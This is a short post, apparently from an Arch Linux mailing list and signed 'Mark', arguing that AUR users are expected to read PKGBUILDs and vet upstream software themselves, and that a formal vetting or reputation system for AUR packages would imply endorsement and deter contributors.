The expectation of the AUR is that users vet upstream software, and read the PKGBUILD, right? If you do this, none of the malicious packages I've seen would have affected you. I worry building any kind of fomal vetting or reputation system for aur packages will look like a defacto endorsement of the packages themselves, which i don't think we're trying to do.
Correct me if I'm missing something, but I dont see the value in anything past letting your AUR helper show you diffs, which the ones I've used all do. Anything else we do raises the barrier for community AUR contributions, and won't provide meaningful warranty or security. Mark
